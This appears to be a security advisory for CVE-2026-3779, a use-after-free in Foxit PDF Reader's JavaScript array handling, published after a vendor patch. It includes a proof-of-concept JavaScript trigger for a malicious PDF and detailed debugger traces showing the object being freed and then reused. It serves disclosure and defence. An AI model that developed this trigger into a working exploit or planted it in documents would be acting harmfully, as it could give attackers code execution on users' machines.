CVE-2026-3779
A use-after-free vulnerability exists in the way Foxit Reader handles an Array object. A specially crafted JavaScript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Foxit Reader 2025.3.0.35737
Foxit Reader – https://www.foxitsoftware.com/pdf-reader/
7.8 – CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-416 – Use After Free
Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.
JavaScript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles an array object. This can be illustrated by the following proof-of-concept code:
“`
function main() { app.activeDocs[0].getField(‘List Box0’).setItems([‘a’,app.activeDocs[0][“IDS_MONTH_INFO”]]); getField(“txt2”).setAction(“Calculate”,’delete_pages();’); app.activeDocs[0].getField(‘List Box0’)[‘value’] = new Array(10); } function delete_pages() { app.activeDocs[0].deletePages(); }
“`
The above code simply assigns a callback function to `Calculate` event for the field `txt2`, which is promptly triggered by call to `getField` . In the action callback, all that happens is a call to `deletePages`, which in turn ends up freeing all the objects associated with a page. The use-after-free vulnerability occurs when an array object is freed by `deletePages()` and is used without any validation. We can observe the following in the debugger (with PageHeap enabled):
“`
:007> p Breakpoint 1 hit Time Travel Position: 288B55:368 FoxitPDFReader!safe_vsnprintf+0x3404c7: 00007ff6`f8f076d7 b948000000 mov ecx,48h ;<————- (1) 0:007> p Time Travel Position: 288B55:369 FoxitPDFReader!safe_vsnprintf+0x3404cc: 00007ff6`f8f076dc e81fa72c00 call FoxitPDFReader!safe_vsnprintf+0x60abf0 (00007ff6`f91d1e00) ;<————- (2) 0:007> p Time Travel Position: 288B6A:B5F FoxitPDFReader!safe_vsnprintf+0x3404d1: 00007ff6`f8f076e1 488985d8000000 mov qword ptr [rbp+0D8h],rax ss:000000af`78be8178=00000248351ddfb0 0:007> r rax=000002484298bfb0 rbx=00000248377dafd0 rcx=000000007ffe0380 rdx=d0d0d0d0d0d0d0d0 rsi=0000000000400000 rdi=00000248351ddfb0 rip=00007ff6f8f076e1 rsp=000000af78be7fa0 rbp=000000af78be80a0 r8=0000000000000000 r9=0000000000000000 r10=0000000000000000 r11=000002484298bfb0 r12=00000248351ddfb0 r13=0000000000000000 r14=00007ff6fe5c27b8 r15=00000248377daeb0 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 FoxitPDFReader!safe_vsnprintf+0x3404d1: 00007ff6`f8f076e1 488985d8000000 mov qword ptr [rbp+0D8h],rax ss:000000af`78be8178=00000248351ddfb0 0:007> dd 000002484298bfb0 ;<————- (3) 00000248`4298bfb0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 00000248`4298bfc0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 00000248`4298bfd0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 00000248`4298bfe0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 00000248`4298bff0 c0c0c0c0 c0c0c0c0 d0d0d0d0 d0d0d0d0 00000248`4298c000 ???????? ???????? ???????? ???????? 00000248`4298c010 ???????? ???????? ???????? ???????? 00000248`4298c020 ???????? ???????? ???????? ????????
“`
The vulnerable object is created by calling a function at `(2)`, and the size of the object is passed to the function at `(1)`. After allocation, the vulnerable object is examined at `(3)`.
“`
0:007> r rax=0000000000000001 rbx=00000248377dafd0 rcx=0000024854540000 rdx=0000024854540000 rsi=000002482280cfc0 rdi=000002484298bfb0 rip=00007ff6f8f0a1e1 rsp=000000af78bebea0 rbp=000000000000000a r8=0000000000000000 r9=0000000000000001 r10=00000000ffffffef r11=000000af78bebdd0 r12=000000af78bebf78 r13=00000248377daeb0 r14=0000000000000000 r15=00000248351ddfb0 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 FoxitPDFReader!safe_vsnprintf+0x342fd1: 00007ff6`f8f0a1e1 488bcf mov rcx,rdi ; <—————- (4) 0:007> p Time Travel Position: 3720A9:254 FoxitPDFReader!safe_vsnprintf+0x342fd4: 00007ff6`f8f0a1e4 e8f77c2c00 call FoxitPDFReader!safe_vsnprintf+0x60acd0 (00007ff6`f91d1ee0) ; <—————- (5) […] 0:007> p Time Travel Position: 3720A9:273 FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a66: 00007ff6`fc7d1116 4883ec20 sub rsp,20h 0:007> p Time Travel Position: 3720A9:274 FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a6a: 00007ff6`fc7d111a 4c8bc1 mov r8,rcx ; <—————- (6) 0:007> dd rcx 00000248`4298bfb0 00000007 00000000 377daeb0 00000248 00000248`4298bfc0 351ddfb0 00000248 00000000 00000000 00000248`4298bfd0 2ddb1ff0 00000248 00000000 00000001 00000248`4298bfe0 00000000 00000008 00000000 c0c0c0c0 00000248`4298bff0 00000000 00000000 d0d0d0d0 d0d0d0d0 00000248`4298c000 ???????? ???????? ???????? ???????? 00000248`4298c010 ???????? ???????? ???????? ???????? 00000248`4298c020 ???????? ???????? ???????? ???????? 0:007> p Time Travel Position: 3720A9:275 FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a6d: 00007ff6`fc7d111d 33d2 xor edx,edx 0:007> p Time Travel Position: 3720A9:276 FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a6f: 00007ff6`fc7d111f 488b0d128fde02 mov rcx,qword ptr [FoxitPDFReader!fLI::FLAGS_v+0xb9af0 (00007ff6`ff5ba038)] ds:00007ff6`ff5ba038=0000024854540000 0:007> p Time Travel Position: 3720A9:277 FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a76: 00007ff6`fc7d1126 ff158cc08900 call qword ptr [FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x2515b08 (00007ff6`fd06d1b8)] ds:00007ff6`fd06d1b8={KERNEL32!HeapFreeStub (00007ff8`323c58b0)} ; <—————- (7) 0:007> p Time Travel Position: 3720AE:249 FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a7c: 00007ff6`fc7d112c 85c0 test eax,eax 0:007> dd 00000248`4298bfb0 ; <—————- (8) 00000248`4298bfb0 00000007 00000000 377daeb0 00000248 00000248`4298bfc0 351ddfb0 00000248 00000000 00000000 00000248`4298bfd0 2ddb1ff0 00000248 00000000 00000001 00000248`4298bfe0 00000000 00000008 00000000 c0c0c0c0 00000248`4298bff0 00000000 00000000 d0d0d0d0 d0d0d0d0 00000248`4298c000 ???????? ???????? ???????? ???????? 00000248`4298c010 ???????? ???????? ???????? ???????? 00000248`4298c020 ???????? ???????? ???????? ????????
“`
Later, when the JavaScript API `deletePages()` is called, it frees all the objects associated with the page. It calls a method at `(5)`, which in turn calls the `HeapFree` function at `(7)` to free the vulnerable object. The `rcx` register at `(6)` contains a pointer to the vulnerable object. The method called at `(7)` frees the object, and the contents of the object are examined at `(8)` after the free operation. Note that the analysis was performed using a TTD trace, and at `(8)` the TTD index shows the last recorded values of the address after it was freed.
The vulnerable object is later used without any validation. This can be observed in a debugger at the time of the crash:
“`
0:007> g (144c.d20): Access violation – code c0000005 (first/second chance not available) First chance exceptions are reported before any exception handling. This exception may be expected and handled. Time Travel Position: 372B43:0 FoxitPDFReader!safe_vsnprintf+0x35695b: 00007ff6`f8f1db6b 488b4910 mov rcx,qword ptr [rcx+10h] ds:00000248`4298bfc0=00000248351ddfb0 ;<—————- (9) 0:007> u FoxitPDFReader!safe_vsnprintf+0x35695b: 00007ff6`f8f1db6b 488b4910 mov rcx,qword ptr [rcx+10h] 00007ff6`f8f1db6f e82c99ffff call FoxitPDFReader!safe_vsnprintf+0x350290 (00007ff6`f8f174a0) 00007ff6`f8f1db74 4885c0 test rax,rax 00007ff6`f8f1db77 7405 je FoxitPDFReader!safe_vsnprintf+0x35696e (00007ff6`f8f1db7e) 00007ff6`f8f1db79 803805 cmp byte ptr [rax],5 00007ff6`f8f1db7c 7470 je FoxitPDFReader!safe_vsnprintf+0x3569de (00007ff6`f8f1dbee) 00007ff6`f8f1db7e 8b03 mov eax,dword ptr [rbx] 00007ff6`f8f1db80 83e807 sub eax,7 0:007> r rax=00000000ffffffff rbx=000002484298bfb0 rcx=000002484298bfb0 rdx=00007ff6fe5c2758 rsi=0000000000000001 rdi=000000af78bed1c8 rip=00007ff6f8f1db6b rsp=000000af78bed090 rbp=0000000000000001 r8=0000000000000000 r9=0000000000000001 r10=00000000ffffffef r11=000000af78becf40 r12=0000000000000009 r13=000000af78bed310 r14=000000000000000a r15=00007ff6fe5c2758 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 FoxitPDFReader!safe_vsnprintf+0x35695b: 00007ff6`f8f1db6b 488b4910 mov rcx,qword ptr [rcx+10h] ds:00000248`4298bfc0=00000248351ddfb0 0:007> dd 000002484298bfb0 00000248`4298bfb0 00000007 00000000 377daeb0 00000248 00000248`4298bfc0 351ddfb0 00000248 00000000 00000000 00000248`4298bfd0 2ddb1ff0 00000248 00000000 00000001 00000248`4298bfe0 00000000 00000008 00000000 c0c0c0c0 00000248`4298bff0 00000000 00000000 d0d0d0d0 d0d0d0d0 00000248`4298c000 ???????? ???????? ???????? ???????? 00000248`4298c010 ???????? ???????? ???????? ???????? 00000248`4298c020 ???????? ???????? ???????? ???????? 0:007> kb # RetAddr : Args to Child : Call Site 00 00007ff6`f8f1db34 : 00000000`00000001 000000af`78bed1c8 000000af`78bed230 00000000`00000009 : FoxitPDFReader!safe_vsnprintf+0x35695b 01 00007ff6`fa40f92f : 00000000`00000001 000000af`78bed218 00000000`00000000 00000000`00000001 : FoxitPDFReader!safe_vsnprintf+0x356924 02 00007ff6`fa3f2b10 : 000000af`78bed300 000000af`78bed328 000000af`78bed3d0 000000af`78bed420 : FoxitPDFReader!safe_vsnprintf+0x184871f 03 00007ff6`fa41d2e1 : 00000248`1f0b6e40 000000af`78bed420 00000000`00000001 00000248`34bc3000 : FoxitPDFReader!safe_vsnprintf+0x182b900 04 00007ff6`fa3e5cda : 00000248`1f0b6e40 00000000`00000000 000000af`78bed430 00000248`1f0b6e40 : FoxitPDFReader!safe_vsnprintf+0x18560d1 05 00007ff6`fa8d91b4 : 00000248`34bc3000 00000248`30804ff0 00000248`41b9fff0 00000248`42d40fe0 : FoxitPDFReader!safe_vsnprintf+0x181eaca 06 00007ff6`fa9722a2 : 00000248`450a20f0 000000af`78bedd08 000000af`78bed480 000000af`78bedce8 : FoxitPDFReader!FXJSE_GetClass+0x824 07 00007ff6`fa98a482 : 000000af`78bedc00 000000af`78bed699 000000af`78bedcf0 00000248`450a20f0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x98bf2 08 00007ff6`fa98a15d : 000000af`78bedd08 00000000`00000000 000000af`78bedd08 000000af`78bed968 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb0dd2 09 00007ff6`fa98ab3b : 00000000`00000000 00000248`450a20e8 00000000`00000000 00000000`00000000 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb0aad 0a 00007ff6`fa98a0ed : 000000af`78bedd08 000000af`78beda01 000000af`78bedd08 00007ff6`f7270000 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb148b 0b 00007ff6`fa989d1d : 00000251`00098305 00000002`faaa7f01 00000248`34bc3000 00000251`001b78ad : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb0a3d 0c 00007ff6`fb061c38 : 00000000`00000001 000000af`78bedc01 000000af`78bedad0 00000000`0000004e : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb066d 0d 00007ff6`fb058cdc : 00000000`00000000 00000248`450a4000 00000248`00000003 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x50a588 0e 00007ff6`faf07bee : 00007ff6`fb058ab0 00000251`001d1675 00000000`0000004e 00000248`450a20d0 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x50162c 0f 00007ff6`faff461b : 00000251`00000e2d 00000251`00098305 00000251`00000069 ffffffff`fffffffe : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3b053e 10 00007ff6`fae5bfa1 : 00000251`0009e8e1 00000251`001eb615 00000000`00000014 00000251`0018abb1 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x49cf6b 11 00007ff6`fae5bfa1 : 00000251`001d160d 00000251`001eb51d 00000251`001eb56d 00000251`00000069 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3048f1 12 00007ff6`fae596d0 : 00000251`001d160d 00000251`00000775 00000251`001eb51d 00000000`0000001a : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3048f1 13 00007ff6`fae59227 : 00000000`00000000 00000000`00000000 00000000`00000002 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x302020 14 00007ff6`fa92f07f : 000000af`78bee0fc 000000af`78bedfe9 000000af`78bee168 00000000`00000005 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x301b77 15 00007ff6`fa92eb24 : 000000af`78bee168 00000248`34bc3000 00000251`001e0005 00000248`34bcc110 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x559cf 16 00007ff6`fa90ea1b : 00000248`34bc32b0 000000af`78bee210 00000248`2d161a50 00000248`450a2020 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x55474 17 00007ff6`fa90e781 : 00000248`450a2050 00000248`450a2018 00000248`34bc3000 00000248`44b56fc0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3536b 18 00007ff6`fa8d6746 : 00000248`41ab3ff0 00000248`450a2050 00000248`450a2018 00000248`41ab3ff0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x350d1 19 00007ff6`fa8d768b : 00000248`450a2050 00000248`41ab3ff0 00000248`4509be90 00000248`450a2020 : FoxitPDFReader!FXJSE_Runtime_Release+0x1106 1a 00007ff6`fa37f35d : 00000000`00000000 00000248`30ac2fb8 00000248`30ac2fb8 00000248`30ac2fb0 : FoxitPDFReader!FXJSE_ExecuteScript+0x27b 1b 00007ff6`f7e3dde3 : 00000248`00000003 00000248`1823cb90 000000af`78bee610 000000af`78bee530 : FoxitPDFReader!safe_vsnprintf+0x17b814d 1c 00007ff6`f7e3c4b3 : 00000248`00535ff0 000000af`78bee5c0 00000000`00000000 00000248`1a87afb0 : FoxitPDFReader!std::basic_ios >::fill+0x3ab453 1d 00007ff6`f7e3a866 : 00007ff6`f7e3a790 00000248`00535ff0 00000248`44a94d30 00000000`00000000 : FoxitPDFReader!std::basic_ios >::fill+0x3a9b23 1e 00007ff6`f74992d9 : 00007ff6`f7e3a790 000000af`78bee700 00000248`37bc2dc8 00000248`02c5cfd0 : FoxitPDFReader!std::basic_ios >::fill+0x3a7ed6 1f 00007ff6`f772a93e : 00000000`00000000 00000000`00060510 00000248`1a87afb0 000000af`78bee740 : FoxitPDFReader!std::basic_ostream >::operator<<+0x7909 20 00007ff6`fc43bbfa : 00000000`00000189 00000000`00000001 00007ff6`f772a8c0 00000000`00000000 : FoxitPDFReader!std::basic_ostream >::put+0x7023e 21 00007ff6`fc43d107 : 00000248`35104cb0 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18e454a 22 00007ff6`fc43602c : 00000000`00000000 00000248`5a292eb8 00000000`00000000 00000000`00000429 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18e5a57 23 00007ff6`fc436aec : 00007ff6`ff382078 00000000`00060510 00000248`5a292e78 00007ff6`fc42c690 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18de97c 24 00007ff8`31d6ef5c : 00000000`00000001 00000248`5a292e20 00000000`00060510 00000000`00060510 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18df43c 25 00007ff8`31d6e684 : 00000000`00000000 00007ff6`fc436a98 000000af`78dd2800 00007ff6`fc42e33c : USER32!UserCallWinProcCheckWow+0x50c 26 00007ff6`f76a8c7a : 00007ff6`fc436a98 00000248`024875d0 00000000`00000001 00007ff6`ff5bb190 : USER32!DispatchMessageWorker+0x494 27 00007ff6`f76a8d74 : 00000000`00000001 00007ff6`ff5bb190 00000000`00000000 00000000`00000000 : FoxitPDFReader!std::basic_ostream >::operator<<+0x15f0fa 28 00007ff6`fca24eb7 : 00000000`00000001 00007ff6`f7270000 00000000`00000000 00000248`545bdf3c : FoxitPDFReader!std::basic_ostream >::operator<<+0x15f1f4 29 00007ff6`fc69bdf2 : 00000000`00000001 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1ecd807 2a 00007ff8`323c7374 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1b44742 2b 00007ff8`33c9cc91 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14 2c 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
“`
The crash occurs at `(9)` when the object is dereferenced without any validation. Depending on the memory layout of the process, it may be possible to perform arbitrary read and write operations, which could ultimately be exploited to achieve arbitrary code execution.
2026-02-10 – Vendor Disclosure
2026-03-31 – Vendor Patch Release
2026-03-31 – Public Release
Discovered by KPC of Cisco Talos.